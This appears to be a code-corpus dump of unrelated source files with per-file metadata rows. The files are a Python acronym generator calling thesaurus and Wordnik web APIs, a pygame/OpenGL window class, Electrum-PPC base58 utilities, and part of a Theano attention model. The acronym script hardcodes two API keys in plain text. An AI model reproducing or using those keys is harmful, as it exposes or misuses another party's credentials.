yrmo+= 1
return (yrmo + day) * 86400 #24 * 60 * 60
| apache-2.0 | 8,460,138,943,254,883,000 | 37.214936 | 129 | 0.614585 | false | 3.744423 | false | false | false |
Fireforge/AcronatorServer | acronization.py | 1 | 5783 | import json
import argparse
import random
import sys
import requests
BIGHUGELABS_API_KEY = 'f79909b74265ba8593daf87741f3c874'
buzzWords = ['alignment','bot', 'collusion', 'derivative', 'engagement', 'focus', 'gathering' ,'housing','liability','management','nomenclature','operation','procedure','reduction','strategic','technology','undertaking','vision','widget','yardbird']
forbiddenWords = ['who','what','when','where','why','were','am','and','there','their']
class AcronymLetter:
def __init__(self, letter, word_list):
self.letter = letter.upper()
self.words = word_list
def __str__(self):
outString = ''
for word in self.words:
if len(outString) == 0:
outString = self.letter + " - " + str(word)
else:
outString = outString + ", " + str(word)
return outString
class Word:
def __init__(self, word, priority):
self.word = word
self.priority = priority
def __str__(self):
return self.word + " : " + str(self.priority)
def acronym_finder(inputAcronym, inputGeneralKeywords, numOutputs=5, minWordLength=2):
# holds letter objects
acronym = []
inputError = False
if minWordLength < 2:
print('You dun goofed. Minimum word length must be greater than 1')
inputError = True
if numOutputs < 1:
print('WTF! How does it make sense to print any less than 1 output?')
inputError = True
if inputError:
sys.exit()
# Generate possible word names from the synonym API
for keyword in inputGeneralKeywords:
thesaurusList_url = "http://words.bighugelabs.com/api/2/" + BIGHUGELABS_API_KEY + "/" + keyword + "/json"
thesaurusResponse = requests.get(thesaurusList_url)
if thesaurusResponse.status_code == 200:
thesaurusJson = json.loads(thesaurusResponse.text)
# this is normal for some words.
elif thesaurusResponse.status_code == 404:
continue
else:
print("Shit: " + str(thesaurusResponse.status_code))
letters = []
for i, c in enumerate(inputAcronym):
letters.append(c)
distinctLetters = list(set(letters))
# Rank possible synonym words for each letter in the acronym
for letter in distinctLetters:
firstLetter = letter.lower()
wordList = []
if thesaurusResponse.status_code == 200:
for wordType in thesaurusJson.keys():
for meaningType in thesaurusJson[wordType].keys():
for word in thesaurusJson[wordType][meaningType]:
if word[0] == firstLetter and word.count(' ') == 0 and len(word) >= minWordLength:
for w in wordList:
if w.word == word:
priority = w.priority + 1
wordList.remove(w)
wordList.insert(0,Word(word,priority))
break
else:
wordList.append(Word(word,1))
randomWords_url = "http://api.wordnik.com:80/v4/words.json/search/" + firstLetter + "?caseSensitive=false&includePartOfSpeech=noun&minCorpusCount=5&maxCorpusCount=-1&minDictionaryCount=1&maxDictionaryCount=-1&minLength=" + str(minWordLength) + "&maxLength=-1&skip=0&limit=" + str(4 * minWordLength * minWordLength * minWordLength) + "&api_key=a2a73e7b926c924fad7001ca3111acd55af2ffabf50eb4ae5"
randomWordsResponse = requests.get(randomWords_url)
if randomWordsResponse.status_code == 200:
randomWordsJson = json.loads(randomWordsResponse.text)
for entry in randomWordsJson["searchResults"]:
word = entry["word"]
if word[0] == firstLetter and len(word) >= minWordLength and word.count(' ') == 0:
wordList.append(Word(word,0))
sorted(wordList, key=lambda word: word.priority)
acronym.append(AcronymLetter(firstLetter,wordList))
# Generate possible acronym results
winners = []
for x in range (0,numOutputs):
winner = ''
for i, c in enumerate(inputAcronym):
for letter in acronym:
if letter.letter == c:
try:
word = letter.words[0]
if len(winner) == 0:
winner = word.word
letter.words.remove(word)
else:
winner = winner + ' ' + word.word
letter.words.remove(word)
except IndexError:
print("Can't get all {} words".format(len(acronym)))
# Sanity Check if the winner is a valid acronym
#if len(winner.split(' ')) == len(acronym):
winners.append(winner)
return winners
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='De-Generate Acronym')
parser.add_argument('acronym', metavar='ACR',help='the acronym')
parser.add_argument('--numOutputs', metavar='NOU',type=int, help='number of outputs', default=1)
parser.add_argument('--minLength', metavar='MIN',type=int, help='minimum length of words used', default=2)
parser.add_argument('keywords', metavar='KEY', nargs='+',help='some keywords')
args = parser.parse_args()
winner_list = acronym_finder(
inputAcronym=args.acronym,
numOutputs=args.numOutputs,
inputGeneralKeywords=args.keywords,
minWordLength=args.minLength)
print('\n'.join(winner_list))
# Test call
# print(acronym_finder('hello', 5, 'world'))
| mit | 8,642,745,247,605,629,000 | 38.882759 | 402 | 0.582743 | false | 3.876005 | false | false | false |
overdev/easygl-0.1.0-alpha1 | easygl/display/window.py | 1 | 11847 | # !/usr/bin/python
# -*- coding: utf-8 -*-
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#
# The MIT License (MIT)
#
# Copyright (c) 2017 Jorge A. Gomes (jorgegomes83 at hotmail dot com)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
import datetime as dt
import OpenGL.GL as GL
import pygame as pg
import pygame.locals as co
from enum import Enum
from typing import Union, Optional
from contextlib import contextmanager
from easygl.structures import Vec4, Vec2
from .events import *
__all__ = [
'BlendMode',
'DisplayError',
'GLWindow',
'Multisamples',
'Projection',
]
class DisplayError(Exception):
pass
class Multisamples(Enum):
none = 0
double = 1
triple = 2
quad = 3
class BlendMode(Enum):
none = 0
add = 1
alpha = 2
multiply = 3
class Projection(Enum):
custom = 0
ortho_up = 1
ortho_down = 2
class GLWindow(object):
_current = None # type: GLWindow
def __init__(self, width, height, title, multisamples, blendmode, projection, **kwargs):
# type: (int, int, str, Multisamples, BlendMode, Projection) -> None
if self.__class__._current is not None:
raise DisplayError("Display already initialized. Call reset() method to change settings.")
color = kwargs.get('clear_color', (0., 0., 0., 1.))
size = width, height
flags = co.OPENGL
flags |= co.RESIZABLE if kwargs.get('resizable', False) else 0
flags |= co.DOUBLEBUF if kwargs.get('doublebuf', False) else 0
flags |= co.FULLSCREEN if kwargs.get('fullscreen', False) else 0
flags |= co.HWSURFACE if kwargs.get('hwsurface', False) else 0
pg.init()
if multisamples is not Multisamples.none:
samples = {
Multisamples.double: 2,
Multisamples.triple: 3,
Multisamples.quad: 4
}.get(multisamples, 2)
pg.display.gl_set_attribute(pg.GL_MULTISAMPLESAMPLES, samples)
surface = pg.display.set_mode(size, flags)
# print(surface)
width, height = surface.get_size()
pg.display.set_caption(title, title)
if multisamples is not Multisamples.none:
GL.glEnable(GL.GL_MULTISAMPLE)
GL.glEnable(GL.GL_BLEND)
GL.glClearColor(*color)
GL.glViewport(0, 0, width, height)
self._handling_input = False
self._rendering = False
self._close_request = False
self._blend_mode = None
self.blend_mode = blendmode
self._projection = projection
self._flip_time = 0
self._input_time = 0
self._render_time = 0
self._delta = 1
@property
def projection(self):
return self._projection
@property
def title(self):
return pg.display.get_caption()
@title.setter
def title(self, value):
pg.display.set_caption(repr(value), repr(value))
@property
def should_close(self):
# type: () -> bool
return self._close_request
@property
def resolution(self):
# type: () -> tuple
return pg.display.get_surface().get_size()
@property
def width(self):
# type: () -> int
return pg.display.get_surface().get_width()
@property
def height(self):
# type: () -> int
return pg.display.get_surface().get_height()
@property
def blend_mode(self):
# type: () -> BlendMode
return self._blend_mode
@blend_mode.setter
def blend_mode(self, value):
# type: (BlendMode) -> None
if value is not self._blend_mode:
self._blend_mode = value
if value is BlendMode.none:
GL.glBlendFunc(GL.GL_ONE, GL.GL_ZERO)
elif value is BlendMode.add:
try:
GL.glBlendFuncSeparate(GL.GL_SRC_ALPHA, GL.GL_ONE, GL.GL_ONE, GL.GL_ONE)
except (NameError, Exception):
GL.glBlendFunc(GL.GL_SRC_ALPHA, GL.GL_ONE)
elif value is BlendMode.alpha:
try:
GL.glBlendFuncSeparate(
GL.GL_SRC_ALPHA, GL.GL_ONE_MINUS_SRC_ALPHA, GL.GL_ONE, GL.GL_ONE_MINUS_SRC_ALPHA)
except (NameError, Exception):
GL.glBlendFunc(GL.GL_SRC_ALPHA, GL.GL_ONE_MINUS_SRC_ALPHA)
elif value is BlendMode.multiply:
try:
GL.glBlendFuncSeparate(GL.GL_ALPHA, GL.GL_ONE, GL.GL_ONE, GL.GL_ONE)
except (NameError, Exception):
GL.glBlendFunc(GL.GL_DST_COLOR, GL.GL_ZERO)
@property
def mouse_pos(self):
# type: () -> Vec2
x, y = pg.mouse.get_pos()
if self._projection is Projection.ortho_up:
y = pg.display.get_surface().get_height() - y
return Vec2(x, y)
@property
def mouse_motion(self):
# type: () -> Vec2
x, y = pg.mouse.get_rel()
if self._projection is Projection.ortho_up:
y = -y
return Vec2(x, y)
@property
def frame_delta(self):
# type: () -> int
return self._delta
@contextmanager
def input(self, raw=False):
# type: () -> None
if self._handling_input:
raise RuntimeError("Can't nest input processing contexts.")
self._handling_input = True
time = pg.time.get_ticks()
delta = time - self._input_time
self._input_time = time
if raw:
yield delta, pg.event.get(), pg.key.get_pressed(), Vec2(*pg.mouse.get_pos()), Vec2(*pg.mouse.get_rel())
else:
events = []
for event in pg.event.get():
if event.type == co.ACTIVEEVENT:
events.append(Focus(event.gain, event.state, pg.time.get_ticks()))
elif event.type == co.QUIT:
now = dt.datetime.now()
ms = pg.time.get_ticks()
self._close_request = True
events.append(CloseWindow(ms, now))
elif event.type == co.KEYDOWN:
ctrl = event.mod & co.KMOD_ALT != 0
shift = event.mod & co.KMOD_SHIFT != 0
alt = event.mod & co.KMOD_ALT != 0
events.append(KeyDown(event.key, event.unicode, event.mod, ctrl, shift, alt))
elif event.type == co.KEYUP:
ctrl = event.mod & co.KMOD_ALT != 0
shift = event.mod & co.KMOD_SHIFT != 0
alt = event.mod & co.KMOD_ALT != 0
events.append(KeyUp(event.key, event.mod, ctrl, shift, alt))
elif event.type == co.MOUSEMOTION:
height = pg.display.get_surface().get_height()
x, y = event.pos
mx, my = event.rel
if self._projection is Projection.ortho_up:
y = height - y
my = -my
lbutton, mbutton, rbutton = event.buttons
events.append(MouseMotion(Vec2(x, y), Vec2(mx, my), lbutton, mbutton, rbutton))
elif event.type == co.MOUSEBUTTONDOWN:
height = pg.display.get_surface().get_height()
x, y = event.pos
if self._projection is Projection.ortho_up:
y = height - y
if event.button == 1:
events.append(LeftButtonDown(Vec2(x, y), x, y))
elif event.button == 2:
events.append(MiddleButtonDown(Vec2(x, y), x, y))
elif event.button == 3:
events.append(RightButtonDown(Vec2(x, y), x, y))
elif event.button == 4:
events.append(MouseWheelUp(Vec2(x, y), x, y))
else:
events.append(MouseWheelDown(Vec2(x, y), x, y))
elif event.type == co.MOUSEBUTTONUP:
height = pg.display.get_surface().get_height()
x, y = event.pos
if self._projection is Projection.ortho_up:
y = height - y
if event.button == 1:
events.append(LeftButtonUp(Vec2(x, y), x, y))
elif event.button == 2:
events.append(MiddleButtonUp(Vec2(x, y), x, y))
else:
events.append(RightButtonUp(Vec2(x, y), x, y))
elif event.type == co.VIDEORESIZE:
events.append(VideoResize(event.w, event.h, event.size))
elif event.type == co.VIDEOEXPOSE:
now = dt.datetime.now()
ms = pg.time.get_ticks()
events.append(VideoExpose(ms, now))
elif event.type == co.JOYAXISMOTION:
events.append(JoyAxis(event.joy, event.axis, event.value))
elif event.type == co.JOYBALLMOTION:
events.append(JoyBall(event.joy, event.ball, event.rel))
elif event.type == co.JOYHATMOTION:
events.append(JoyHat(event.joy, event.hat, event.value))
elif event.type == co.JOYBUTTONDOWN:
events.append(JoyButtonDown(event.joy, event.button))
elif event.type == co.JOYBUTTONUP:
events.append(JoyButtonUp(event.joy, event.button))
keys = pg.key.get_pressed()
mouse_pos = Vec2(*pg.mouse.get_pos())
mouse_rel = Vec2(*pg.mouse.get_rel())
if self._projection is Projection.ortho_up:
mouse_pos.y = self.height - mouse_pos.y
mouse_rel.y = -mouse_rel.y
yield delta, events, keys, mouse_pos, mouse_rel
self._handling_input = False
@contextmanager
def rendering(self, clear_color=None):
# type: (Optional[Union[Vec4, tuple, list]]) -> None
if self._rendering:
raise RuntimeError("Can't nest GLWindow rendering contexts.")
self._rendering = True
time = pg.time.get_ticks()
delta = time - self._render_time
self._render_time = time
yield delta
pg.display.flip()
time = pg.time.get_ticks()
self._delta = time - self._flip_time
self._flip_time = time
if clear_color is not None:
GL.glClearColor(*clear_color)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
self._rendering = False
def close(self):
# type: () -> None
self._close_request = True
| mit | 6,686,868,297,029,935,000 | 34.364179 | 115 | 0.543682 | false | 3.857701 | false | false | false |
testalt/electrum-ppc-server | src/utils.py | 1 | 6099 | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from itertools import imap
import threading
import time
import hashlib
import sys
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)
global PUBKEY_ADDRESS
global SCRIPT_ADDRESS
PUBKEY_ADDRESS = 138
SCRIPT_ADDRESS = 5
def rev_hex(s):
return s.decode('hex')[::-1].encode('hex')
def int_to_hex(i, length=1):
s = hex(i)[2:].rstrip('L')
s = "0"*(2*length - len(s)) + s
return rev_hex(s)
def var_int(i):
if i < 0xfd:
return int_to_hex(i)
elif i <= 0xffff:
return "fd" + int_to_hex(i, 2)
elif i <= 0xffffffff:
return "fe" + int_to_hex(i, 4)
else:
return "ff" + int_to_hex(i, 8)
Hash = lambda x: hashlib.sha256(hashlib.sha256(x).digest()).digest()
hash_encode = lambda x: x[::-1].encode('hex')
hash_decode = lambda x: x.decode('hex')[::-1]
def header_to_string(res):
pbh = res.get('prev_block_hash')
if pbh is None:
pbh = '0'*64
return int_to_hex(res.get('version'), 4) \
+ rev_hex(pbh) \
+ rev_hex(res.get('merkle_root')) \
+ int_to_hex(int(res.get('timestamp')), 4) \
+ int_to_hex(int(res.get('bits')), 4) \
+ int_to_hex(int(res.get('nonce')), 4)
def hex_to_int(s):
return int('0x' + s[::-1].encode('hex'), 16)
def header_from_string(s):
return {
'version': hex_to_int(s[0:4]),
'prev_block_hash': hash_encode(s[4:36]),
'merkle_root': hash_encode(s[36:68]),
'timestamp': hex_to_int(s[68:72]),
'bits': hex_to_int(s[72:76]),
'nonce': hex_to_int(s[76:80]),
}
############ functions from pywallet #####################
def hash_160(public_key):
try:
md = hashlib.new('ripemd160')
md.update(hashlib.sha256(public_key).digest())
return md.digest()
except:
import ripemd
md = ripemd.new(hashlib.sha256(public_key).digest())
return md.digest()
def public_key_to_pubkey_address(public_key):
return hash_160_to_pubkey_address(hash_160(public_key))
def public_key_to_bc_address(public_key):
""" deprecated """
return public_key_to_pubkey_address(public_key)
def hash_160_to_pubkey_address(h160, addrtype=None):
""" deprecated """
if not addrtype:
addrtype = PUBKEY_ADDRESS
return hash_160_to_address(h160, addrtype)
def hash_160_to_pubkey_address(h160):
return hash_160_to_address(h160, PUBKEY_ADDRESS)
def hash_160_to_script_address(h160):
return hash_160_to_address(h160, SCRIPT_ADDRESS)
def hash_160_to_address(h160, addrtype = 0):
""" Checks if the provided hash is actually 160bits or 20 bytes long and returns the address, else None
"""
if h160 is None or len(h160) is not 20:
return None
vh160 = chr(addrtype) + h160
h = Hash(vh160)
addr = vh160 + h[0:4]
return b58encode(addr)
def bc_address_to_hash_160(addr):
if addr is None or len(addr) is 0:
return None
bytes = b58decode(addr, 25)
return bytes[1:21] if bytes is not None else None
def b58encode(v):
"""encode v, which is a string of bytes, to base58."""
long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += (256**i) * ord(c)
result = ''
while long_value >= __b58base:
div, mod = divmod(long_value, __b58base)
result = __b58chars[mod] + result
long_value = div
result = __b58chars[long_value] + result
# Bitcoin does a little leading-zero-compression:
# leading 0-bytes in the input become leading-1s
nPad = 0
for c in v:
if c == '\0':
nPad += 1
else:
break
return (__b58chars[0]*nPad) + result
def b58decode(v, length):
""" decode v into a string of len bytes."""
long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += __b58chars.find(c) * (__b58base**i)
result = ''
while long_value >= 256:
div, mod = divmod(long_value, 256)
result = chr(mod) + result
long_value = div
result = chr(long_value) + result
nPad = 0
for c in v:
if c == __b58chars[0]:
nPad += 1
else:
break
result = chr(0)*nPad + result
if length is not None and len(result) != length:
return None
return result
def EncodeBase58Check(vchIn):
hash = Hash(vchIn)
return b58encode(vchIn + hash[0:4])
def DecodeBase58Check(psz):
vchRet = b58decode(psz, None)
key = vchRet[0:-4]
csum = vchRet[-4:]
hash = Hash(key)
cs32 = hash[0:4]
if cs32 != csum:
return None
else:
return key
########### end pywallet functions #######################
def random_string(length):
with open("/dev/urandom", 'rb') as f:
return b58encode( f.read(length) )
def timestr():
return time.strftime("[%d/%m/%Y-%H:%M:%S]")
### logger
import logging
import logging.handlers
logger = logging.getLogger('electrum-ppc')
def init_logger(logfile):
hdlr = logging.handlers.WatchedFileHandler(logfile)
formatter = logging.Formatter('%(asctime)s %(message)s', "[%d/%m/%Y-%H:%M:%S]")
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.INFO)
def print_log(*args):
logger.info(" ".join(imap(str, args)))
def print_warning(message):
logger.warning(message)
| agpl-3.0 | -1,488,351,987,294,061,300 | 23.396 | 107 | 0.610756 | false | 3.181534 | false | false | false |
BladeSun/NliWithKnowledge | session2/dam_bk_1.py | 1 | 59183 | '''
Build a neural machine translation model with soft attention
'''
import theano
import theano.tensor as tensor
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
import cPickle as pkl
import ipdb
import numpy
import copy
import os
import warnings
import sys
import time
import logging
from collections import OrderedDict
from data_iterator_bk import TextIterator
profile = False
# push parameters to Theano shared variables
def zipp(params, tparams):
for kk, vv in params.iteritems():
tparams[kk].set_value(vv)
# pull parameters from Theano shared variables
def unzip(zipped):
new_params = OrderedDict()
for kk, vv in zipped.iteritems():
new_params[kk] = vv.get_value()
return new_params
# get the list of parameters: Note that tparams must be OrderedDict
def itemlist(tparams):
return [vv for kk, vv in tparams.iteritems()]
# dropout
def dropout_layer(state_before, use_noise, trng):
proj = tensor.switch(
use_noise,
state_before * trng.binomial(state_before.shape, p=0.5, n=1,
dtype=state_before.dtype),
state_before * 0.5)
return proj
# make prefix-appended name
def _p(pp, name):
return '%s_%s' % (pp, name)
# initialize Theano shared variables according to the initial parameters
def init_tparams(params):
tparams = OrderedDict()
for kk, pp in params.iteritems():
tparams[kk] = theano.shared(params[kk], name=kk)
return tparams
# load parameters
def load_params(path, params):
pp = numpy.load(path)
for kk, vv in params.iteritems():
if kk not in pp:
warnings.warn('%s is not in the archive' % kk)
continue
params[kk] = pp[kk]
return params
# layers: 'name': ('parameter initializer', 'feedforward')
layers = {'ff': ('param_init_fflayer', 'fflayer'),
'gru': ('param_init_gru', 'gru_layer'),
'gru_cond': ('param_init_gru_cond', 'gru_cond_layer'),
'funcf_layer': ('param_init_funcf_layer', 'funcf_layer'),
}
def get_layer(name):
fns = layers[name]
return (eval(fns[0]), eval(fns[1]))
# some utilities
def ortho_weight(ndim):
W = numpy.random.randn(ndim, ndim)
u, s, v = numpy.linalg.svd(W)
return u.astype('float32')
def norm_weight(nin, nout=None, scale=0.01, ortho=True):
if nout is None:
nout = nin
if nout == nin and ortho:
W = ortho_weight(nin)
else:
W = scale * numpy.random.randn(nin, nout)
return W.astype('float32')
def relu(x):
return tensor.nnet.relu(x)
def tanh(x):
return tensor.tanh(x)
def linear(x):
return x
def concatenate(tensor_list, axis=0):
"""
Alternative implementation of `theano.tensor.concatenate`.
This function does exactly the same thing, but contrary to Theano's own
implementation, the gradient is implemented on the GPU.
Backpropagating through `theano.tensor.concatenate` yields slowdowns
because the inverse operation (splitting) needs to be done on the CPU.
This implementation does not have that problem.
:usage:
>>> x, y = theano.tensor.matrices('x', 'y')
>>> c = concatenate([x, y], axis=1)
:parameters:
- tensor_list : list
list of Theano tensor expressions that should be concatenated.
- axis : int
the tensors will be joined along this axis.
:returns:
- out : tensor
the concatenated tensor expression.
"""
concat_size = sum(tt.shape[axis] for tt in tensor_list)
output_shape = ()
for k in range(axis):
output_shape += (tensor_list[0].shape[k],)
output_shape += (concat_size,)
for k in range(axis + 1, tensor_list[0].ndim):
output_shape += (tensor_list[0].shape[k],)
out = tensor.zeros(output_shape)
offset = 0
for tt in tensor_list:
indices = ()
for k in range(axis):
indices += (slice(None),)
indices += (slice(offset, offset + tt.shape[axis]),)
for k in range(axis + 1, tensor_list[0].ndim):
indices += (slice(None),)
out = tensor.set_subtensor(out[indices], tt)
offset += tt.shape[axis]
return out
# batch preparation
def prepare_data(seqs_x, seqs_x_syn, seqs_y, seqs_y_syn, label, maxlen=None, n_words_src=30000,
n_words=30000, bk_for_x=None, bk_for_y=None, bk_dim=10):
# x: a list of sentences
lengths_x = [len(s) for s in seqs_x]
lengths_y = [len(s) for s in seqs_y]
if maxlen is not None:
new_seqs_x = []
new_seqs_x_syn = []
new_seqs_y = []
new_seqs_y_syn = []
new_lengths_x = []
new_lengths_y = []
new_label = []
for l_x, s_x, s_x_syn, l_y, s_y, s_y_syn, ll in zip(lengths_x, seqs_x, seqs_x_syn, lengths_y, seqs_y, seqs_y_syn, label):
if l_x < maxlen and l_y < maxlen:
new_seqs_x.append(s_x)
new_seqs_x_syn.append(s_x_syn)
new_lengths_x.append(l_x)
new_seqs_y.append(s_y)
new_seqs_y_syn.append(s_y_syn)
new_lengths_y.append(l_y)
new_label.append(ll)
lengths_x = new_lengths_x
seqs_x = new_seqs_x
seqs_x_syn = new_seqs_x_syn
lengths_y = new_lengths_y
seqs_y = new_seqs_y
seqs_y_syn = new_seqs_y_syn
label = new_label
if len(lengths_x) < 1 or len(lengths_y) < 1:
return None, None, None, None, None, None, None
n_samples = len(seqs_x)
maxlen_x = numpy.max(lengths_x) + 2
maxlen_y = numpy.max(lengths_y) + 2
x = numpy.zeros((maxlen_x, n_samples)).astype('int64')
x_syn = numpy.zeros((maxlen_x, n_samples)).astype('int64')
y = numpy.zeros((maxlen_y, n_samples)).astype('int64')
y_syn = numpy.zeros((maxlen_y, n_samples)).astype('int64')
flabel = numpy.array(label).astype('int64')
x_mask = numpy.zeros((maxlen_x, n_samples)).astype('float32')
y_mask = numpy.zeros((maxlen_y, n_samples)).astype('float32')
for idx, [s_x, s_x_syn, s_y, s_y_syn] in enumerate(zip(seqs_x, seqs_x_syn, seqs_y, seqs_y_syn)):
x[0, idx] = 1
x[lengths_x[idx]+1, idx] = 2
x[1:lengths_x[idx] + 1, idx] = s_x
x_mask[:lengths_x[idx] + 2, idx] = 1.
x_syn[0, idx] = 3 # 3 for none
x_syn[lengths_x[idx]+1, idx] = 3
x_syn[1:lengths_x[idx] + 1, idx] = s_x_syn
y[0, idx] = 1
y[lengths_y[idx]+1, idx] = 2
y[1:lengths_y[idx] + 1, idx] = s_y
y_mask[:lengths_y[idx] + 2, idx] = 1.
y_syn[0, idx] = 3 # 3 for none
y_syn[lengths_y[idx]+1, idx] = 3
y_syn[1:lengths_y[idx] + 1, idx] = s_y_syn
getbk = lambda sid, batch_id, target, bkdict: numpy.array([numpy.array(bkdict[sid][tid]).astype('float32') if tid in bkdict[sid] else numpy.zeros(bk_dim).astype('float32') for tid in target[:, batch_id]])
bk_x = numpy.array([getbk(z[0], z[1], y_syn, bk_for_x) if z[0] in bk_for_x else numpy.zeros((maxlen_y,bk_dim)).astype('float32') for z in zip(x_syn.reshape(-1).tolist(), range(n_samples) * maxlen_x) ]).reshape(maxlen_x, n_samples, maxlen_y, bk_dim)
bk_y = numpy.array([getbk(z[0], z[1], x_syn, bk_for_y) if z[0] in bk_for_y else numpy.zeros((maxlen_x,bk_dim)).astype('float32') for z in zip(y_syn.reshape(-1).tolist(), range(n_samples) * maxlen_y) ]).reshape(maxlen_y, n_samples, maxlen_x, bk_dim)
bk_x = bk_x[:,:,:,(0,11,12)]
return x, x_mask, bk_x, y, y_mask, bk_y, flabel
# feedforward layer: affine transformation + point-wise nonlinearity
def param_init_fflayer(options, params, prefix='ff', nin=None, nout=None,
ortho=True):
if nin is None:
nin = options['dim_proj']
if nout is None:
nout = options['dim_proj']
params[_p(prefix, 'W')] = norm_weight(nin, nout, scale=0.01, ortho=ortho)
params[_p(prefix, 'b')] = numpy.zeros((nout,)).astype('float32')
return params
def fflayer(tparams, state_below, options, prefix='rconv',
activ='lambda x: tensor.tanh(x)', **kwargs):
return eval(activ)(
tensor.dot(state_below, tparams[_p(prefix, 'W')]) +
tparams[_p(prefix, 'b')])
# functionF layer
def param_init_funcf_layer(options, params, prefix='funcF', nin=None, nout=None,
ortho=True):
if nin is None:
nin = options['dim_word']
if nout is None:
nout = options['dim_proj']
params[_p(prefix, 'W1')] = norm_weight(nin, nout, scale=0.01, ortho=ortho)
params[_p(prefix, 'b1')] = numpy.zeros((nout,)).astype('float32')
params[_p(prefix, 'W2')] = norm_weight(nout, nout, scale=0.01, ortho=ortho)
params[_p(prefix, 'b2')] = numpy.zeros((nout,)).astype('float32')
return params
def funcf_layer(tparams, state_below, options, prefix='funcF',
activ='lambda x: tensor.tanh(x)', **kwargs):
emb_proj = (tensor.dot(state_below, tparams[_p(prefix, 'W1')]) +
tparams[_p(prefix, 'b1')])
return eval(activ)(
tensor.dot(emb_proj, tparams[_p(prefix, 'W2')]) +
tparams[_p(prefix, 'b2')])
# GRU layer
def param_init_gru(options, params, prefix='gru', nin=None, dim=None):
if nin is None:
nin = options['dim_proj']
if dim is None:
dim = options['dim_proj']
# embedding to gates transformation weights, biases
W = numpy.concatenate([norm_weight(nin, dim),
norm_weight(nin, dim)], axis=1)
params[_p(prefix, 'W')] = W
params[_p(prefix, 'b')] = numpy.zeros((2 * dim,)).astype('float32')
# recurrent transformation weights for gates
U = numpy.concatenate([ortho_weight(dim),
ortho_weight(dim)], axis=1)
params[_p(prefix, 'U')] = U
# embedding to hidden state proposal weights, biases
Wx = norm_weight(nin, dim)
params[_p(prefix, 'Wx')] = Wx
params[_p(prefix, 'bx')] = numpy.zeros((dim,)).astype('float32')
# recurrent transformation weights for hidden state proposal
Ux = ortho_weight(dim)
params[_p(prefix, 'Ux')] = Ux
return params
def gru_layer(tparams, state_below, options, prefix='gru', mask=None,
**kwargs):
nsteps = state_below.shape[0]
if state_below.ndim == 3:
n_samples = state_below.shape[1]
else:
n_samples = 1
dim = tparams[_p(prefix, 'Ux')].shape[1]
if mask is None:
mask = tensor.alloc(1., state_below.shape[0], 1)
# utility function to slice a tensor
def _slice(_x, n, dim):
if _x.ndim == 3:
return _x[:, :, n * dim:(n + 1) * dim]
return _x[:, n * dim:(n + 1) * dim]
# state_below is the input word embeddings
# input to the gates, concatenated
state_below_ = tensor.dot(state_below, tparams[_p(prefix, 'W')]) + \
tparams[_p(prefix, 'b')]
# input to compute the hidden state proposal
state_belowx = tensor.dot(state_below, tparams[_p(prefix, 'Wx')]) + \
tparams[_p(prefix, 'bx')]
# step function to be used by scan
# arguments | sequences |outputs-info| non-seqs
def _step_slice(m_, x_, xx_, h_, U, Ux):
preact = tensor.dot(h_, U)
preact += x_
# reset and update gates
r = tensor.nnet.sigmoid(_slice(preact, 0, dim))
u = tensor.nnet.sigmoid(_slice(preact, 1, dim))
# compute the hidden state proposal
preactx = tensor.dot(h_, Ux)
preactx = preactx * r
preactx = preactx + xx_
# hidden state proposal
h = tensor.tanh(preactx)
# leaky integrate and obtain next hidden state
h = u * h_ + (1. - u) * h
h = m_[:, None] * h + (1. - m_)[:, None] * h_
return h
# prepare scan arguments
seqs = [mask, state_below_, state_belowx]
init_states = [tensor.alloc(0., n_samples, dim)]
_step = _step_slice
shared_vars = [tparams[_p(prefix, 'U')],
tparams[_p(prefix, 'Ux')]]
rval, updates = theano.scan(_step,
sequences=seqs,
outputs_info=init_states,
non_sequences=shared_vars,
name=_p(prefix, '_layers'),
n_steps=nsteps,
profile=profile,
strict=True)
rval = [rval]
return rval
# Conditional GRU layer with Attention
def param_init_gru_cond(options, params, prefix='gru_cond',
nin=None, dim=None, dimctx=None,
nin_nonlin=None, dim_nonlin=None):
if nin is None:
nin = options['dim']
if dim is None:
dim = options['dim']
if dimctx is None:
dimctx = options['dim']
if nin_nonlin is None:
nin_nonlin = nin
if dim_nonlin is None:
dim_nonlin = dim
W = numpy.concatenate([norm_weight(nin, dim),
norm_weight(nin, dim)], axis=1)
params[_p(prefix, 'W')] = W
params[_p(prefix, 'b')] = numpy.zeros((2 * dim,)).astype('float32')
U = numpy.concatenate([ortho_weight(dim_nonlin),
ortho_weight(dim_nonlin)], axis=1)
params[_p(prefix, 'U')] = U
Wx = norm_weight(nin_nonlin, dim_nonlin)
